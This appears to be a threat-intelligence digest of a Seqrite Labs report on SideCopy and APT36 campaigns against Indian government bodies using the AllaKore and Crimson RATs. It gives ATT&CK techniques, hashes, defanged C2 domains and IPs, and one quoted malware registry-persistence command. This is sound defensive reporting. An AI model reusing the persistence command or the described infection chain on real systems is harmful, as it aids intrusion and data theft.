Threat Research

Pakistani APTs Escalate Attacks on Indian Gov. Seqrite Labs Unveils Threats and Connections – Blogs on Information Technology, Network & Cybersecurity | Seqrite

Securonix

Seqrite Labs tracks campaigns by Pakistan-linked APTs SideCopy and APT36 (Transparent Tribe) targeting Indian government entities, noting multiple campaigns employing AllaKore and Crimson RATs and linking actors through shared infrastructure. The report details infection chains, decoys, C2 communications, and overlaps in tooling and domains to establish associations between the groups. #SideCopy #APT36 #TransparentTribe #AllaKore #CrimsonRAT

Keypoints

  • SideCopy deployed two variants of AllaKore RAT across three campaigns, using compromised domains to host payloads.
  • Transparent Tribe (APT36) repeatedly used Crimson RAT, including encoded or packed versions, sometimes aligned with Linux payloads and shared code.
  • Campaigns leverage spear-phishing with LNK archive files, followed by MSHTA execution to fetch remote HTA content.
  • Persistence is achieved via Run keys in the Registry, and multiple decoy documents are used to mislead victims.
  • Infrastructure overlaps (IP addresses, domains, and C2 servers) link campaigns to SideCopy and APT36 with high confidence.
  • AllaKore and Crimson RATs feature extensive data collection (system info, file enumeration, keylogging, clipboard theft) and multi-stage C2 communications with encrypted channels.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Spear-phishing starts with an archive file containing a shortcut (LNK) in a double-extension format. ‘Spear-phishing starts with an archive file containing a shortcut (LNK) in a double-extension format.’
  • [T1566.002] Phishing: Spearphishing Link – Opening the LNK triggers the MSHTA process, which executes a remote HTA file hosted on a compromised domain. ‘Opening the LNK triggers the MSHTA process, which executes a remote HTA file hosted on a compromised domain.’
  • [T1218.005] Mshta – MSHTA process executes a remote HTA file as part of the initial stage. ‘Opening the LNK triggers the MSHTA process, which executes a remote HTA file hosted on a compromised domain.’
  • [T1036.005] Masquerading: Double File Extension – The infection chain uses a double-extension format to disguise files. ‘archive file containing a shortcut (LNK) in a double-extension format.’
  • [T1140] Deobfuscate/Decode Files or Information – Embedded files are base64 encoded and decoded during the second stage. ‘base64 encoded.’
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence is set via a Run registry key. ‘REG ADD “HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun” /V “issas” /t REG_SZ /F /D “C:UsersPublicissasissas.exe”’
  • [T1056.001] Input Capture: Keylogging – AllaKore functionality includes keylogging. ‘Keylogging’
  • [T1113] Clipboard Data – The RAT steals clipboard data as part of its data collection.
  • [T1083] File and Directory Discovery – AllaKore enumerates files and folders. ‘Enumerating files and folders’
  • [T1105] Ingress Tool Transfer – The malware uploads and downloads payloads during its operation. ‘Upload and execute files’
  • [T1571] Encrypted Channel – C2 communications use encrypted strings and channels. ‘Encrypted strings used for C2 communication’ and ‘Encrypted Channel’
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication over web protocols. ‘Application Layer Protocol: Web Protocols’
  • [T1041] Exfiltration Over C2 Channel – Data is exfiltrated over the C2 channel. ‘Exfiltration Over C2 Channel’

Indicators of Compromise

  • [HTA] 6cdc79655e9866e31f6c901d0a05401d – jfhdsjfh34frjkfs23432.hta
  • [HTA] dbf196ccb2fe4b6fb01f93a603056e55 – flutter.hta
  • [HTA] 37b10e4ac08534ec36a59be0009a63b4 – plugins.hta
  • [HTA] d907284734ea5bf3bd277e118b6c51f0 – bjihfsdfhdjsh234234.hta
  • [HTA] 2a47ea398397730681f121f13efd796f – plugins.hta
  • [HTA] 6ab0466858eb6d71d830e7b2e86dab03 – flutter.hta
  • [HTA] ecc65e6074464706bb2463cb74f576f7 – 4358437iufgdshvjy5843765.hta
  • [HTA] da529e7b6056a055e3bbbace20740ee9 – min-js.hta
  • [HTA] cadafc6a91fc4bba33230baed9a8a338 – nodejsmin.hta
  • [DLL] 1e5285ee087c0d73c76fd5b0b7bc787c – hta.dll
  • [DLL] f74c59fd5b835bf7630fbf885d6a21aa – hta.dll
  • [DLL] 3cc6602a1f8a65b5c5e855df711edeb0 – hta.dll
  • [DLL] 990bfd8bf27be13cca9fa1fa07a28350 – SummitOfBion.dll
  • [File] 29fa44d559b4661218669aa958851a59 – SummitOfBion.dll
  • [File] 26bde2d6a60bfc6ae472c0e9c8d976e2 – SummitOfBion.dll
  • [PDB] Windows.Management.Workplace.WorkplaceSettings.pdb – msdr.dll
  • [PDB] dbghelp.pdb – braveservice.dll
  • [Domain] revivelife.in – associated assets/js/…/new/ and assets/js/…/grant/
  • [Domain] smokeworld.in – associated assets
  • [Domain] vparking.online – associated assets
  • [IP] 151.106.97.183 – compromised domain hosting (revivelife, vparking)
  • [IP] 162.241.85.104 – compromised domain hosting (ssynergy, elf in dia)
  • [IP] 164.68.102.44 – Contabo/Germany-based C2
  • [IP] 213.136.94.11 – Contabo/ Germany-based C2
  • [URL] hxxps://revivelife.in/assets/js/other/new/ – C2 hosting
  • [URL] hxxps://revivelife.in/assets/js/other/grant/ – C2 hosting
  • [File] Grant_of_Risk_and_HardShip_Allowances_Mar_24.pdf – decoy document
  • [File] Imp message from dgms.xlam – decoy document
  • [Host] C:ProgramDataHPflutter.hta – host path
  • [Host] C:UsersPublicissasissas.exe – host path
  • [Host] C:UsersPublicquickquick.exe – host path

Read more: https://www.seqrite.com/blog/pakistani-apts-escalate-attacks-on-indian-gov-seqrite-labs-unveils-threats-and-connections/